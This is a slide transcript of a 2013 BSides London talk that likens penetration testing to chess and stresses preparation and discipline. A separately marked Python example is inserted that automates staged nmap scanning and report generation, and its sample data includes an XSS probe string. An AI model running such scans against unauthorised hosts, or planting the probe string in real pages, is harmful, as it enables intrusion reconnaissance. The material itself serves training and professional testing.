Pentesting like a grandmaster BSides London 2013
![Page 1: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/1.jpg)
Pentesting like a Grandmaster
Abraham Aranguren: @7a_ @owtfp
[email protected]
http://7-a.org
http://owtf.org
BSides London, 24th April 2013
![Page 2: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/2.jpg)
Agenda
• Intro
• What makes a great player/tester
• Hacking is like Chess
• Intelligence = 1 variable
• Strength of Play Factors
1. Individual Skill
2. Game Preparation
3. Game Performance
• OWASP OWTF in 5 minutes
• Pwnage and WIN scenarios
• Conclusion
• Q&A
![Page 3: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/3.jpg)
About me
• Spanish dude
• Uni: Degree, InfoSec research + honour mark
• IT: Since 2000, defensive sec as netadmin / developer
• (Offensive) InfoSec: Since 2007
• OSCP, CISSP, GWEB, CEH, MCSE, etc.
• WebAppSec and Dev/Architect
• Infosec consultant, blogger, VSA, OWTF, GIAC, BeEF
![Page 4: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/4.jpg)
Disclaimer I
I am..
• NOT a grandmaster
• NOT that smart
• NOT a rockstar like HD Moore, etc.
BUT using these techniques I could outperform people:
• Smarter than me
• With more experience than me
• Way more skilled than me
![Page 5: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/5.jpg)
Disclaimer II
Some of the people I will use for examples have done horrible/stupid/inappropriate things such as:
• Biting off somebody’s ear (Tyson)
• Having affairs outside of marriage (Arnold, Capablanca)
• Endorsing Scientology (Will Smith)
• Anti-Semitism (Bobby Fischer), etc
This talk focuses on what it took these and other people to succeed and how we can learn from that ONLY
Celebrity FAIL would be a whole different talk ☺
![Page 6: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/6.jpg)
Hacking is like Chess
http://imgur.com/YAnUh
![Page 7: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/7.jpg)
Hacking is like Chess
http://imgur.com/YAnUh
![Page 8: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/8.jpg)
Hacking is like Chess
http://imgur.com/YAnUh
![Page 9: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/9.jpg)
Intelligence = 1 variable
So you watched these guys ...
… and (maybe) you thought: “I am just not smart enough…”
HD Moore, Dan Kaminsky
![Page 10: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/10.jpg)
How far can you get with “modest intelligence” in life?
![Page 11: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/11.jpg)
Success is Possible
Success is possible for people with IQs < 160:
• 78: Muhammad Ali: “The greatest of all time” → > 80%?
• 98: George H.W. Bush: US president → > 70% people
• 110: Dr. Karl: Science freak on Triple J → > 40% people
• 135: Arnold Schwarzenegger: Success BEAST → 2% people
• 135: Garry Kasparov: World Chess Champion → 2% people
Recommended reading: http://garthzietsman.blogspot.com/2012/03/chess-intelligence-and-winning.html
![Page 12: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/12.jpg)
High IQ != Guaranteed success
“Very high genius IQ”: A Motorcycle mechanic who hangs out with biker gangs and is frequently in and out of jail
“Highest IQ in North America”: A bouncer in a bar, minimum wage, lives in a tiny garage
http://iq-test.learninginfo.org/iq07.htm
![Page 13: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/13.jpg)
Chess ELO vs. IQ (rough)
Sources:
http://www.sigmasociety.com/old/medias_qi.html
http://www.jlevitt.dircon.co.uk/iq.htm
http://www.ifvll.ethz.ch/people/sterne/Grabner_Stern_Neubauer_Acta_2006.pdf
http://garthzietsman.blogspot.com/2012/03/chess-intelligence-and-winning.html
![Page 14: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/14.jpg)
Strength of Play Factors
![Page 15: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/15.jpg)
Strength of Play Factors
Major strength of play factors:
1. Individual Skill: Years → Training, experience
2. Game Preparation: Days/Weeks/Months → Game-specific
3. Game Performance: 1 minute - 2.5 hours
Equal importance:
• FAIL: Individual Skill without game preparation
• FAIL: Game preparation without some Individual Skill
• FAIL: Game performance without preparation or skill
NOTE: In Security testing “The Game” might be 5 days, 2 weeks, etc. but the same rules apply…
![Page 16: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/16.jpg)
1. Individual Skill
![Page 17: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/17.jpg)
Start Early = Advantage
Most World Chess Champions learned to play early:
• 4 years old: Capablanca
• 4 years old: Euwe
• 4 years old: Karpov
• 5 years old: Alekhine
• 5 years old: Kasparov
• 6 years old: Fischer
• 8 years old: Tal
BUT some started a bit later:
• 12 years old: Botvinnik
Some argued this “weakness” showed in some of his games
Same goes for technology, programming, security, etc:
Starting early == More total time to learn == Advantage
![Page 18: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/18.jpg)
Will Smith: Talent vs. Skill
“… talent you have naturally, skill is only developed by hours and hours and hours of beating on your craft. …where I excel is ridiculous, sickening, work ethic: While the other guy is sleeping I’m working, while the other guy is eating I’m working…”
“.. talent is going to fail you if you are not skilled: if you don’t study, if you don’t work really hard and dedicate yourself to being better every single day..”
http://www.youtube.com/watch?v=DNqQ5JAY88c
![Page 19: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/19.jpg)
Relentless Passion: Fischer
“You can only get good at chess if you love the game.”
“Chess demands total concentration and a love for the game.”
“I give 98 percent of my mental energy to chess. Others give only 2 percent.”
![Page 20: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/20.jpg)
Relentless Passion: Larry
Larry Pesce from PaulDotCom (paraphrasing quote):
“…I just don’t stop: Since I wake up until I go to bed I am trying things out and doing research on my laptop, even beside my wife as she watches TV..”
![Page 21: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/21.jpg)
Rule 5: Work your butt off
“…Leaving no stone unturned… no pain no gain … so yeah .. Partying, washing around .. Someone out there at the same time is working hard, someone is getting smarter and someone is winning, just remember that … there is absolutely no way around hard hard work”
Arnold’s 6 Rules of success: http://www.youtube.com/watch?v=Y7zntXR-VmA
![Page 22: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/22.jpg)
Pain is temporary: Ali
“Pain is temporary, it may last a minute, an hour or even a year, but eventually, it will subside and something else will take its place .. At the end of pain is success: You are not going down because you feel a little pain!”
“I’m exactly where I want to be because I realize I gotta commit my very being to this thing, I gotta breathe it, I gotta eat it, I gotta sleep it and until you get there you’ll never be successful in life but once you get there I guarantee you the world is yours so work hard and you can have whatever it is you want.”
http://www.youtube.com/watch?v=7pE4m2THO_U
![Page 23: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/23.jpg)
Discipline
"...People who'd want to be in my shoes they really think so because they think: wow, they'd make money they'd be rich BUT if they had to go through some of the things I had to go through I think they'd cry, sometimes is so depressive ... that's what discipline is, discipline is going in and doing something that you don't wanna do but you do it like you love it..."
http://www.youtube.com/watch?v=drmBziMus9E
![Page 24: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/24.jpg)
What’s the difference
“... these successful people realise that they have an allotted time to perform a given test so that they have to give it their absolute all to doing that test ...
…these people gave it their heart and their soul, throughout every single rep, every single set, every single gym session, every single day for weeks, for months, for years, for decades to get to where they were…
... that they were going to break through all mental barriers to get to where they wanted to be and that is the difference between the successful people and those who are not” - Jaret Grossman
http://www.youtube.com/watch?v=Sk56VxaeqEQ
![Page 25: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/25.jpg)
How to stay motivated
http://smileyandwest.ning.com/profiles/blogs/the-subconscious-mind-re-focus
Your subconscious will believe what you tell it!.. and what others tell it too! (i.e. “you will never X”)
Repeating your goals to your subconscious builds drive:99% of successful people do this (consciously or not)
![Page 26: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/26.jpg)
Stay healthy
Dan Kaminsky and Alex Hutton, enjoying a Mojito, Brucon 2011
![Page 27: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/27.jpg)
Dr Layne Norton PhD: Deadlift tips
“…staying healthy is a huge thing because if you are hurt, you can’t lift, you can’t get better … and consistency …you keep accumulating small improvements overtime…“
http://www.youtube.com/watch?v=IWRReBFHvAg – min ~ 1:10
![Page 28: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/28.jpg)
“Smart people learn from their own mistakes…… Really smart people learn from other people’s mistakes”
![Page 29: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/29.jpg)
Stay healthy: Alekhine
World Champion 1927-35 + 1937-46
Loss of the title (1935): “Kmoch wrote that Alekhine drank no alcohol for the first half of the match, but later took a glass before most games”
http://en.wikipedia.org/wiki/Alexander_Alekhine
Recovery of the title (1937): “Euwe lost the title to Alekhine in a rematch in 1937, also played in The Netherlands, by the lopsided margin of 15½–9½. Alekhine had given up alcohol to prepare for the rematch, although he would start drinking again later”
http://en.wikipedia.org/wiki/Max_Euwe
![Page 30: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/30.jpg)
Stay healthy: Tal
Could the youngest* (24) Chess World Champion keep his crown for more than 1 year? .. Of course! (*Kasparov’s 22 was later)
World Champion 1960–61
“…bohemian life of chess playing, heavy drinking and chain smoking.. his health suffered … spent much time in hospital.. remove a kidney in 1969… briefly addicted to morphine due to intense pain …On May 28, 1992, dying from kidney failure, left hospital to play at the Moscow blitz tournament, where he defeated Garry Kasparov”
http://en.wikipedia.org/wiki/Mikhail_Tal
![Page 31: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/31.jpg)
Stay healthy: Fischer
World Champion 1972-75
“Before and during the match, Fischer paid special attention to his physical training and fitness, which was a relatively novel approach for top chess players at that time. He had developed his tennis skills to a good level, and played frequently …and swam for extended periods, usually late at night…”
http://en.wikipedia.org/wiki/Bobby_fischer
“Your body has to be in top condition. Your chess deteriorates as your body does. You can't separate body from mind.” – Bobby Fischer
![Page 32: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/32.jpg)
Stay healthy: Kasparov
World Champion 1985–2000
“Every morning, he ran barefoot for two and a half miles along the beach, and afterward he swam just beyond the breaking surf or played tennis on a court nestled in the woods behind the house..
After lunch and a nap, he spent five or six hours at the chessboard…”
http://www.nytimes.com/1990/10/07/magazine/king-kasparov.html
![Page 33: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/33.jpg)
Practical Tips
“Just” (!) don’t stop:
• Find things that motivate YOU and listen, etc to that: Search youtube for “motivation”, get mp3 from video, etc.
• Read a lot: papers, presentations, PoCs, etc
• Watch a lot: Webinars, Talks, demos
• Practice a lot: Focus on what interests/motivates you
• Listen a lot: InfoSec podcasts
Podcasts are awesome to keep learning while you do your non-intellectual activities such as: Cooking, cleaning, tidying-up, driving, etc
If you are a podcaster: Minimise the fillers or you’ll lose your audience (skipping is annoying + impractical while driving, etc)
![Page 34: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/34.jpg)
Don’t Fry your CNS
If you work hard be careful you don’t fry your CNS: Your central nervous system (CNS) has finite recovery ability
You know you’ve fried your CNS when:
• You (surprisingly) get sick
• Your mental/physical performance drops
• Caffeine doesn’t work
• You feel like you need to sleep all day: tiredness, etc
If this happens you need to:
• Sleep without alarms for 10 days (try 1 x week after fix)
• Clean-up your diet + Exercise
• Caffeine: Avoid it or cycle it
Cycle caffeine on and off: Use “on” days and “off” days
Use caffeine early in the day: Clear it fully before sleep!
![Page 35: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/35.jpg)
Suggested watching
Awesome talk explaining what it takes to build up individual skill:
Haroon Meer - You and Your Research
http://www.youtube.com/watch?v=JoVx_-bM8Tg
Also worth a look: http://www.slideshare.net/reidhoffman/startup-of-you-visual-summary
![Page 36: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/36.jpg)
2. Game Preparation
Can happen:
1) Before the game / pentest:
Goals:
• Scope better
• Do better
2) During a tournament / pentest:
Goals:
• React to the unexpected
• Avoid detection
• Prepare an attack
![Page 37: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/37.jpg)
Chess Player approach
Chess players:
• Memorise openings
• Memorise endings
• Memorise entire lines of attack/defence
• Try hard to analyse games efficiently
Pen tester translation:
• Chess players precompute all they can
• Chess players analyse info only once
Chess player prep (simplified ☺):
1. Find + prep exploits for opponent weaknesses
2. Precompute an obscure opening: best replies analysed at home for weeks/months
3. Kick the opponent out of precomputation with it
![Page 38: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/38.jpg)
Alekhine vs Capablanca
World Championship Match 1927
![Page 39: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/39.jpg)
Alekhine vs Capablanca
World Championship Match 1927
.. Alekhine's victory surprised almost the entire chess world. Capablanca entered the match with no technical or physical preparation, while Alekhine got himself into good physical condition, and had thoroughly studied Capablanca's play.
According to Kasparov, Alekhine's research uncovered many small inaccuracies.
Luděk Pachman suggested that Capablanca, who was unaccustomed to losing games or to any other type of setback, became depressed over his unnecessary loss of the eleventh game..
http://en.wikipedia.org/wiki/Jos%C3%A9_Ra%C3%BAl_Capablanca
Physical Prep + Opponent Research + Mental toughness = WIN
![Page 40: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/40.jpg)
Garry Kasparov vs Nigel Short
World Championship Match 1993
![Page 41: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/41.jpg)
Match Context
July 1993 FIDE (ELO) rating list. Top 10 players:
1 Kasparov, Gary .................... RUS 2815 → stronger
2 Karpov, Anatoly ................... RUS 2760
…
10 Short, Nigel ...................... ENG 2665 → weaker
http://chess.eusa.ed.ac.uk/Chess/Trivia/AlltimeList.html
“In 1993 Nigel Short played Garry Kasparov .. Nigel Short had won matches against former world champion Anatoly Karpov and Jan Timman on his way to meeting Kasparov.”
http://www.supreme-chess.com/famous-chess-players/nigel-short.html
![Page 42: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/42.jpg)
Nigel Short’s Prep surprises Kasparov
“Kasparov was evidently disoriented as he used 1 hour 29 minutes to Short's 11 minutes(!) for the entire game.”
→ Short (weaker) was 8 times faster
http://www.chessgames.com/perl/chessgame?gid=1070677
![Page 43: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/43.jpg)
Kasparov + team strike back
“In just (!) 9 days after facing it for the first time …Kasparov and his team had found the best reply (11.Ne2) and even succeeded in completely bamboozling Short with 12.Be5” → “This move was a surprise for me. I spent 45 minutes on my reply. I could not fathom out the complications … “ – Nigel Short
http://www.chessgames.com/perl/chessgame?gid=1070681
![Page 44: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/44.jpg)
Anti-Chess Prep: Random Chess
Fischer complained … that because of the progress in openings and the memorization of opening books, the best players from history, if brought back from the dead to play today, would no longer be competitive.
"Some kid of fourteen today, or even younger, could get an opening advantage against Capablanca"
http://en.wikipedia.org/wiki/Bobby_fischer#Fischer_Random_Chess
![Page 45: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/45.jpg)
Pwn2Own: Headlines vs. Prep
Headline: “Apple's Leopard hacked in 30 seconds”
http://www.zdnet.com/apples-leopard-hacked-in-30-seconds-1339287733/
Reality: Charlie Miller on his own prep (2008):
“… It took us a couple of days to find something, then the rest of the week to work up an exploit and test it. It took us maybe a week altogether”
http://www.roughlydrafted.com/2008/03/29/mac-shot-first-10-reasons-why-cansecwest-targets-apple/
Bottom line: 1 week of prep for a 30 second attack
![Page 46: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/46.jpg)
Pwn2Own: Stephen Fewer’s prep
“Fewer says that the successful exploit required use of three separate vulnerabilities:
• Two to achieve successful code execution within the browser
• and then a third to escape Internet Explorer's Protected Mode sandbox.
Putting together the successful attack took Fewer five to six weeks.”
http://arstechnica.com/security/2011/03/pwn2own-day-one-safari-ie8-fall-chrome-unchallenged/
![Page 47: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/47.jpg)
Chris Nickerson on Prep
“.. If you do the proper intelligence gathering you can plan an attack that will work and I say that because you will NOT get stopped: … if you get stopped, it is your fault for not doing enough intelligence gathering so remember it next time”
http://blog.securityactive.co.uk/2009/10/19/chris-nickerson-red-and-tiger-team-testing-brucon-2009/ - min ~16
![Page 48: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/48.jpg)
Kevin Mitnick’s Prep
“.. we can setup their environment in our lab, and …we can …exploit our own environment … this was doing a lot of work prior to the attack: Finding out the AV, finding out the target system and working on bypassing UAC before the client was even hit … And then when we did the attack it worked flawlessly the first time … I think the upfront preparation is really critical to be successful in this stuff”
http://vimeo.com/31663242 - minutes: ~19 + 32:48
![Page 49: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/49.jpg)
OSCP results from 2008
24h hacking challenge: Nessus, etc. forbidden, scripts ok.

| Strength of Play | Matteo Memelli (ryujin) | Me (1st try) | 2 x respected Security Pros |
| --- | --- | --- | --- |
| Individual Skill | 7? (12 in 2013) | < 1 year (weak!) | 5-10 years? |
| Game prep | ? (less than me?) | 1-1,5 months (with a day job) | 0? (maybe only studying?) |
| Game performance | 100% | 100% → WTF? | FAIL → WTF? |
| Time | 9-10 hours (test) | 19 hours (test) + 5 hours (sleep) | 24 hours |

Matteo was x2 faster, but you can’t get more than 100% ☺
Game prep was critical to outperform stronger test takers
![Page 50: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/50.jpg)
My Strategy: Serious prep
Knowing myself (Pre-prep self-feelings at the time)
• Strength: Coding (dev background = edge over net guys)
• Top Likely Weakness: Time (weaker = slower)
Knowing the “enemy” (The 24 hour hacking challenge)
• Tough test: Most people failed (based on IRC)
• Scripts allowed, Nessus, etc forbidden
• Watch purehate’s videos, for ideas, etc → really helpful
Battle prep plan
• Heavy Scripting: Reduce time for uncreative work
• Heavy Practice: Necessary to be faster on more creative/harder to automate work (exploitation, escalation, etc). All exercises, extra miles, etc.
• Podcast Abuse: 3 years of PaulDotCom in 1 month!
![Page 51: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/51.jpg)
Script 1: Prober
Probe more likely open ports first until a full scan completes:
• 1st wave: scan + probe top 100 TCP ports + SNMP → (awesome) results in 5 minutes!
• 2nd wave: scan + probe next 900 TCP ports + few UDP
• 3rd wave: scan remaining TCP ports (slower)
• 4th wave: scan remaining UDP ports (super-slow)
• For each wave: Group report → 1 thing to look at
Summary:
• Staged: Fast results (5-10 minutes for 1st wave)
• Reliable: Even monitored free RAM, etc. before launching things (to avoid crashing my own machine!)
• Auto-Pilot: No supervision required (!babysitting)
![Page 52: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/52.jpg)
Script 2: Reporter
A separate script generated partial reports at any time: I could see the partial probing results and work from there very quickly through a clickable web page.
No waiting until all the probes finished. → critical
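The two scripts above are described only in outline. The block below is an added example (not the speaker's scripts, and not OWTF code) of the same design: waves that touch only ports not yet probed, a free-RAM check before each launch, grouping of results per service so each group is one thing to look at, and a partial HTML report that can be rendered at any moment. It assumes nmap is installed for a real run; the priority tiers are constructed stand-ins for nmap's --top-ports ranking, and the embedded `-oG` output is constructed so the demo runs offline. Note the `html.escape` in the reporter: service banners are text controlled by whatever answered the probe, and a clickable report page that prints them raw is itself an XSS sink.

```python
"""Staged ("wave") port prober with an on-demand HTML reporter, in the spirit
of the talk's Script 1 and Script 2. Added example, not the speaker's scripts.
Assumes nmap is installed for a real run; the priority tiers are constructed
stand-ins for nmap's --top-ports ranking."""
import html
import subprocess
from collections import defaultdict

# Constructed priority tiers (not the real nmap top-100 / top-1000 lists).
TIER1_TCP = [21, 22, 23, 25, 53, 80, 110, 139, 143, 443, 445, 993, 995,
             1433, 3306, 3389, 5900, 8080]
TIER2_TCP = [81, 111, 135, 389, 512, 513, 514, 636, 1521, 2049, 2121,
             5432, 5985, 8000, 8443, 8888]
TIER1_UDP = [161]      # SNMP rides along in the first wave, as on the slide
MIN_FREE_MB = 512      # refuse to launch a wave with less free RAM than this

SAMPLE_OG = (  # constructed nmap -oG output used by the offline demo
    "# Nmap 7.80 scan initiated (constructed sample)\n"
    "Host: 10.0.0.5 ()\tPorts: 22/open/tcp//ssh//OpenSSH 5.3/, "
    "80/open/tcp//http//Apache httpd 2.2.3/, 161/open/udp//snmp//SNMPv1 server/"
    "\tIgnored State: closed (16)\n"
    "Host: 10.0.0.9 ()\tPorts: 80/open/tcp//http//<script>alert(1) httpd/, "
    "443/closed/tcp//https///\tIgnored State: closed (17)\n"
)


def compress_ports(ports):
    """Sorted ints -> nmap range syntax: [22, 23, 24, 80] -> '22-24,80'."""
    ports = sorted(set(ports))
    if not ports:
        return ""
    out, start, prev = [], ports[0], ports[0]
    for p in ports[1:]:
        if p != prev + 1:
            out.append(f"{start}-{prev}" if start != prev else str(start))
            start = p
        prev = p
    out.append(f"{start}-{prev}" if start != prev else str(start))
    return ",".join(out)


def plan_waves(target):
    """Return (name, argv) per wave; each wave only touches unprobed ports."""
    tcp_rest = set(range(1, 65536)) - set(TIER1_TCP) - set(TIER2_TCP)
    udp_rest = set(range(1, 65536)) - set(TIER1_UDP)
    base = ["nmap", "-n", "-Pn", "-sV", "-oG", "-"]
    return [
        ("wave1 top tcp + snmp", base + ["-sT", "-sU", "-p",
         f"T:{compress_ports(TIER1_TCP)},U:{compress_ports(TIER1_UDP)}", target]),
        ("wave2 next tcp", base + ["-p", compress_ports(TIER2_TCP), target]),
        ("wave3 remaining tcp", base + ["-p", compress_ports(tcp_rest), target]),
        ("wave4 remaining udp", base + ["-sU", "-p", compress_ports(udp_rest), target]),
    ]


def free_ram_mb(meminfo="/proc/meminfo"):
    """MemAvailable in MB on Linux; None elsewhere so the caller can decide."""
    try:
        with open(meminfo) as fh:
            for line in fh:
                if line.startswith("MemAvailable:"):
                    return int(line.split()[1]) // 1024
    except OSError:
        pass
    return None


def parse_grepable(text):
    """(host, port, proto, service, version) for every open port in -oG output."""
    found = []
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        for entry in line.split("Ports:", 1)[1].split("\t")[0].split(","):
            f = entry.strip().split("/")   # port/state/proto/owner/service/rpc/version/
            if len(f) >= 7 and f[1] == "open":
                found.append((host, int(f[0]), f[2], f[4], f[6]))
    return found


def run_wave(name, argv, runner=None, min_free_mb=MIN_FREE_MB):
    """Launch one wave, but only if the box has enough free RAM left."""
    free = free_ram_mb()
    if free is not None and free < min_free_mb:
        raise RuntimeError(f"{name}: only {free} MB free, not launching")
    if runner is None:   # real run: nmap's grepable output on stdout
        runner = lambda a: subprocess.run(a, capture_output=True, text=True, check=True).stdout
    return parse_grepable(runner(argv))


def group_by_service(findings):
    """One key per (port, proto, service) so each group is '1 thing to look at'."""
    groups = defaultdict(list)
    for host, port, proto, service, version in findings:
        groups[(port, proto, service)].append((host, version))
    return dict(groups)


def render_report(groups):
    """Partial report as HTML at any point; banners are attacker-controlled
    text, so every value is escaped before it reaches the browser."""
    rows = []
    for (port, proto, service), hosts in sorted(groups.items()):
        cells = ", ".join(f"{html.escape(h)} ({html.escape(v)})" for h, v in hosts)
        rows.append(f"<tr><td>{port}/{proto} {html.escape(service)}</td><td>{cells}</td></tr>")
    return "<table>" + "".join(rows) + "</table>"


if __name__ == "__main__":
    # Offline demo: show the wave plan, then report on the constructed sample.
    for name, argv in plan_waves("10.0.0.0/24"):
        print(name, "->", " ".join(argv)[:80] + "...")
    print(render_report(group_by_service(run_wave("demo", [], runner=lambda a: SAMPLE_OG))))
```

In a real run each wave writes its `-oG` output to its own file and the reporter simply re-parses whatever files exist so far, which is what makes "partial report at any time" work without the reporter knowing which wave is still running.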
![Page 53: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/53.jpg)
The Advantage of organised info
Others spent valuable energy to run (a lot of) tools by hand (12+ terminals open to babysit, etc)…
… I had this in < 10 minutes via scripts!:
![Page 54: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/54.jpg)
When Prep FAILs
Whatever you do prep will fail sooner or later
Option 1) Take the hit: Consider nights, weekends, etc. this will pay off in the test and your future assessments, view it as a "paid training opportunity"
Option 2) Ask for an extension: Find a good reason + Negotiate an extension with your customer
Option 3) Ask for a delay: Take the hit without disrupting your life that much (maybe ☺)
Option 4) All of the above ☺
![Page 55: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/55.jpg)
3. Game Performance
![Page 56: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/56.jpg)
http://www.securitygeneration.com/security/pic-of-the-week-real-world-penetration-testing/
![Page 57: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/57.jpg)
http://www.slideshare.net/bsideslondon/breaking-entering-and-pentesting
